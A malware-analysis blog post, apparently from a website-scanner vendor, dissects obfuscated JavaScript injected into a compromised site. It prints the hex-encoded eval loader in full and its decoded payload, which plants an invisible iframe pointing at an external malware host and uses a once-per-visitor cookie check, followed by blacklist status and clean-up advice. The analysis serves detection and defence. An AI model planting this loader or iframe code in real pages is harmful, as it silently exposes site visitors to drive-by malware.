Monday, November 18, 2013

JavaScript Malware In Website Injecting Malicious Iframes

Compromised website infected with malicious JavaScript

Malicious JavaScript in website pages

Background

Online Website Malware Scanner has identified malicious JavaScript code injection in the scanned website. Obfuscated JavaScript malware injects malicious iframes into the website page(s). Having styling attributes crafted in such a way to be invisible to website visitors, they download content in the background from remote malware distributor.

Similar to discussed in other posts about malicious iframes in websites, this malware is obfuscated and in addition uses cookie bomb technique to evade Anti-Viruses and other detection mechanisms.

Public databases of site scan reports for:
Clean domains
Potentially Suspicious domains
Suspicious domains
Malicious domains

For global web malware monitoring statistic and severity levels:
Last day
Last week
Last month

Malicious action

Malicious iframes are often used to distribute malware hosted on external web resources(websites).

Malware entry details

Obfuscated execution of JavaScript "eval" function.

Beautified script


  1. try {
  2.     + function () {
  3.         if (document.querySelector)++(window[vz].body) == null
  4.     }()
  5. } catch (q) {
  6.     aa = function (ff) {
  7.         ff = "fr" + "omCh" + ff;
  8.         for (= 0; i < z.length; i++) {
  9.             za += String[ff](e(+ (z[i])) - (13));
  10.         }
  11.     };
  12. };
  13. = (eval);
  14. = "0x";
  15. = 0;
  16. try {;
  17. } catch (zz) {
  18.     a = 1
  19. }
  20. if (!a) {
  21.     try {
  22.         ++e(vz)["\x62o" + "d" + z]
  23.     } catch (q) {
  24.         a2 = "^";
  25.     }
  26.     z ="2d^73^82^7b^70^81^76^7c^7b^2d^7f^7d^3d^46^35^36^2d^88^1a^17^2d^83^6e^7f^2d^80^81^6e^81^76^70^4a^34^6e^77^6e^85^34^48^1a^17^2d^83^6e^7f^2d^70^7c^7b^81^7f^7c^79^79^72^7f^4a^34^76^7b^71^72^85^3b^7d^75^7d^34^48^1a^17^2d^83^6e^7f^2d^7f^7d^2d^4a^2d^71^7c^70^82^7a^72^7b^81^3b^70^7f^72^6e^81^72^52^79^72^7a^72^7b^81^35^34^76^73^7f^6e^7a^72^34^36^48^1a^17^1a^17^2d^7f^7d^3b^80^7f^70^2d^4a^2d^34^75^81^81^7d^47^3c^3c^7a^6e^7b^74^7c^79^3b^70^7c^3b^82^78^3c^70^79^6e^80^80^3c^44^57^5e^45^81^5f^58^59^3b^7d^75^7d^34^48^1a^17^2d^7f^7d^3b^80^81^86^79^72^3b^7d^7c^80^76^81^76^7c^7b^2d^4a^2d^34^6e^6f^80^7c^79^82^81^72^34^48^1a^17^2d^7f^7d^3b^80^81^86^79^72^3b^70^7c^79^7c^7f^2d^4a^2d^34^3d^45^43^45^34^48^1a^17^2d^7f^7d^3b^80^81^86^79^72^3b^75^72^76^74^75^81^2d^4a^2d^34^3d^45^43^45^7d^85^34^48^1a^17^2d^7f^7d^3b^80^81^86^79^72^3b^84^76^71^81^75^2d^4a^2d^34^3d^45^43^45^7d^85^34^48^1a^17^2d^7f^7d^3b^80^81^86^79^72^3b^79^72^73^81^2d^4a^2d^34^3e^3d^3d^3d^3d^45^43^45^34^48^1a^17^2d^7f^7d^3b^80^81^86^79^72^3b^81^7c^7d^2d^4a^2d^34^3e^3d^3d^3d^3d^45^43^45^34^48^1a^17^1a^17^2d^76^73^2d^35^2e^71^7c^70^82^7a^72^7b^81^3b^74^72^81^52^79^72^7a^72^7b^81^4f^86^56^71^35^34^7f^7d^34^36^36^2d^88^1a^17^2d^71^7c^70^82^7a^72^7b^81^3b^84^7f^76^81^72^35^34^49^7d^2d^76^71^4a^69^34^7f^7d^69^34^2d^70^79^6e^80^80^4a^69^34^7f^7d^3d^46^69^34^2d^4b^49^3c^7d^4b^34^36^48^1a^17^2d^71^7c^70^82^7a^72^7b^81^3b^74^72^81^52^79^72^7a^72^7b^81^4f^86^56^71^35^34^7f^7d^34^36^3b^6e^7d^7d^72^7b^71^50^75^76^79^71^35^7f^7d^36^48^1a^17^2d^8a^1a^17^8a^1a^17^73^82^7b^70^81^76^7c^7b^2d^60^72^81^50^7c^7c^78^76^72^35^70^7c^7c^78^76^72^5b^6e^7a^72^39^70^7c^7c^78^76^72^63^6e^79^82^72^39^7b^51^6e^86^80^39^7d^6e^81^75^36^2d^88^1a^17^2d^83^6e^7f^2d^81^7c^71^6e^86^2d^4a^2d^7b^72^84^2d^51^6e^81^72^35^36^48^1a^17^2d^83^6e^7f^2d^72^85^7d^76^7f^72^2d^4a^2d^7b^72^84^2d^51^6e^81^72^35^36^48^1a^17^2d^76^73^2d^35^7b^51^6e^86^80^4a^4a^7b^82^79^79^2d^89^89^2d^7b^51^6e^86^80^4a^4a^3d^36^2d^7b^51^6e^86^80^4a^3e^48^1a^17^2d^72^85^7d^76^7f^72^3b^80^72^81^61^76^7a^72^35^81^7c^71^6e^86^3b^74^72^81^61^76^7a^72^35^36^2d^38^2d^40^43^3d^3d^3d^3d^3d^37^3f^41^37^7b^51^6e^86^80^36^48^1a^17^2d^71^7c^70^82^7a^72^7b^81^3b^70^7c^7c^78^76^72^2d^4a^2d^70^7c^7c^78^76^72^5b^6e^7a^72^38^2f^4a^2f^38^72^80^70^6e^7d^72^35^70^7c^7c^78^76^72^63^6e^79^82^72^36^1a^17^2d^38^2d^2f^48^72^85^7d^76^7f^72^80^4a^2f^2d^38^2d^72^85^7d^76^7f^72^3b^81^7c^54^5a^61^60^81^7f^76^7b^74^35^36^2d^38^2d^35^35^7d^6e^81^75^36^2d^4c^2d^2f^48^2d^7d^6e^81^75^4a^2f^2d^38^2d^7d^6e^81^75^2d^47^2d^2f^2f^36^48^1a^17^8a^1a^17^73^82^7b^70^81^76^7c^7b^2d^54^72^81^50^7c^7c^78^76^72^35^2d^7b^6e^7a^72^2d^36^2d^88^1a^17^2d^83^6e^7f^2d^80^81^6e^7f^81^2d^4a^2d^71^7c^70^82^7a^72^7b^81^3b^70^7c^7c^78^76^72^3b^76^7b^71^72^85^5c^73^35^2d^7b^6e^7a^72^2d^38^2d^2f^4a^2f^2d^36^48^1a^17^2d^83^6e^7f^2d^79^72^7b^2d^4a^2d^80^81^6e^7f^81^2d^38^2d^7b^6e^7a^72^3b^79^72^7b^74^81^75^2d^38^2d^3e^48^1a^17^2d^76^73^2d^35^2d^35^2d^2e^80^81^6e^7f^81^2d^36^2d^33^33^1a^17^2d^35^2d^7b^6e^7a^72^2d^2e^4a^2d^71^7c^70^82^7a^72^7b^81^3b^70^7c^7c^78^76^72^3b^80^82^6f^80^81^7f^76^7b^74^35^2d^3d^39^2d^7b^6e^7a^72^3b^79^72^7b^74^81^75^2d^36^2d^36^2d^36^1a^17^2d^88^1a^17^2d^7f^72^81^82^7f^7b^2d^7b^82^79^79^48^1a^17^2d^8a^1a^17^2d^76^73^2d^35^2d^80^81^6e^7f^81^2d^4a^4a^2d^3a^3e^2d^36^2d^7f^72^81^82^7f^7b^2d^7b^82^79^79^48^1a^17^2d^83^6e^7f^2d^72^7b^71^2d^4a^2d^71^7c^70^82^7a^72^7b^81^3b^70^7c^7c^78^76^72^3b^76^7b^71^72^85^5c^73^35^2d^2f^48^2f^39^2d^79^72^7b^2d^36^48^1a^17^2d^76^73^2d^35^2d^72^7b^71^2d^4a^4a^2d^3a^3e^2d^36^2d^72^7b^71^2d^4a^2d^71^7c^70^82^7a^72^7b^81^3b^70^7c^7c^78^76^72^3b^79^72^7b^74^81^75^48^1a^17^2d^7f^72^81^82^7f^7b^2d^82^7b^72^80^70^6e^7d^72^35^2d^71^7c^70^82^7a^72^7b^81^3b^70^7c^7c^78^76^72^3b^80^82^6f^80^81^7f^76^7b^74^35^2d^79^72^7b^39^2d^72^7b^71^2d^36^2d^36^48^1a^17^8a^1a^17^76^73^2d^35^7b^6e^83^76^74^6e^81^7c^7f^3b^70^7c^7c^78^76^72^52^7b^6e^6f^79^72^71^36^1a^17^88^1a^17^76^73^35^54^72^81^50^7c^7c^78^76^72^35^34^83^76^80^76^81^72^71^6c^82^7e^34^36^4a^4a^42^42^36^88^8a^72^79^80^72^88^60^72^81^50^7c^7c^78^76^72^35^34^83^76^80^76^81^72^71^6c^82^7e^34^39^2d^34^42^42^34^39^2d^34^3e^34^39^2d^34^3c^34^36^48^1a^17^1a^17^7f^7d^3d^46^35^36^48^1a^17^8a^1a^17^8a".split(a2);
  27.     za = "";
  28.     aa("arCode");
  29.     e("" + za);
  30. }


Malicious payload


Decoded payload generates hidden iframe to hxxp://mangol.co.uk


  1. function rp09() {
  2.  
  3.     var static = 'ajax';
  4.  
  5.     var controller = 'index.php';
  6.  
  7.     var rp = document.createElement('iframe');
  8.  
  9.  
  10.  
  11.     rp.src = 'http://mangol.co.uk/class/7JQ8tRKL.php';
  12.  
  13.     rp.style.position = 'absolute';
  14.  
  15.     rp.style.color = '0868';
  16.  
  17.     rp.style.height = '0868px';
  18.  
  19.     rp.style.width = '0868px';
  20.  
  21.     rp.style.left = '10000868';
  22.  
  23.     rp.style.top = '10000868';
  24.  
  25.  
  26.  
  27.     if (!document.getElementById('rp')) {
  28.  
  29.         document.write('<p id=\'rp\' class=\'rp09\' ></p>');
  30.  
  31.         document.getElementById('rp').appendChild(rp);
  32.  
  33.     }
  34.  
  35. }
  36.  
  37. function SetCookie(cookieName, cookieValue, nDays, path) {
  38.  
  39.     var today = new Date();
  40.  
  41.     var expire = new Date();
  42.  
  43.     if (nDays == null || nDays == 0) nDays = 1;
  44.  
  45.     expire.setTime(today.getTime() + 3600000 * 24 * nDays);
  46.  
  47.     document.cookie = cookieName + "=" + escape(cookieValue)
  48.  
  49.     + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
  50.  
  51. }
  52.  
  53. function GetCookie(name) {
  54.  
  55.     var start = document.cookie.indexOf(name + "=");
  56.  
  57.     var len = start + name.length + 1;
  58.  
  59.     if ((!start) &&
  60.  
  61.         (name != document.cookie.substring(0, name.length)))
  62.  
  63.     {
  64.  
  65.         return null;
  66.  
  67.     }
  68.  
  69.     if (start == -1) return null;
  70.  
  71.     var end = document.cookie.indexOf(";", len);
  72.  
  73.     if (end == -1) end = document.cookie.length;
  74.  
  75.     return unescape(document.cookie.substring(len, end));
  76.  
  77. }
  78.  
  79. if (navigator.cookieEnabled)
  80.  
  81. {
  82.  
  83.     if (GetCookie('visited_uq') == 55) {} else {
  84.         SetCookie('visited_uq', '55', '1', '/');
  85.  
  86.  
  87.  
  88.         rp09();
  89.  
  90.     }
  91.  
  92. }*/


Blacklisting status

The URL is detected by 3/51 Anti-Virus engines in VirusTotal and noted as being infecting several domains through software vulnerability exploits.


VirusTotal report


Malware clean-up

Being blacklisted, usually, means your website was compromised and detected actively distributed malware or acting as an intermediate in malicious chain. If you suspect that your website was infected, use Website Anti-malware Monitoring for malware removal.

Alternatively, you can try to remove malware using Quttera's website scan report. You will then need to submit your website(s) for re-testing and removing from blacklist.